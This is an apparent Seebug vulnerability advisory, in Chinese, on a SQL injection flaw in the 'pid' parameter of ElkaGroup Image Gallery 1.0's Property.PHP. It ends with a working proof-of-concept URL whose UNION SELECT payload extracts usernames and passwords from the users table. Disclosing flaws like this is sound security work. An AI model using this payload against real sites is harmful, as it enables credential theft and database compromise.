Lucene search

K
seebugRootSSV:1932
HistoryJun 28, 2007 - 12:00 a.m.

ElkaGroup Image Gallery Property.PHP SQL注入漏洞

2007-06-2800:00:00
Root
www.seebug.org
15

ElkaGroup Image Gallery是一款基于PHP的WEB应用程序。

ElkaGroup Image Gallery不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞进行SQL注入攻击获得敏感信息。

问题是由于’Property.PHP’脚本对用户提交的’pid’参数缺少过滤,提交恶意SQL查询作为参数数据,可导致应用程序处理时更改原来的SQL逻辑,攻击者可以获得敏感信息或者操作数据库。

Elkagroup Image Gallery 1.0
目前没有解决方案提供:

<a href=“http://www.elkagroup.com/” target=“_blank”>http://www.elkagroup.com/</a>


                                                http://www.example.com/SCRIPT_PATH/property.php?cid=9&amp;uid=0&amp;pid=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,concat(username,0x3A,userpassword),9,10,11,12,13,14,15,16,17%20from%20users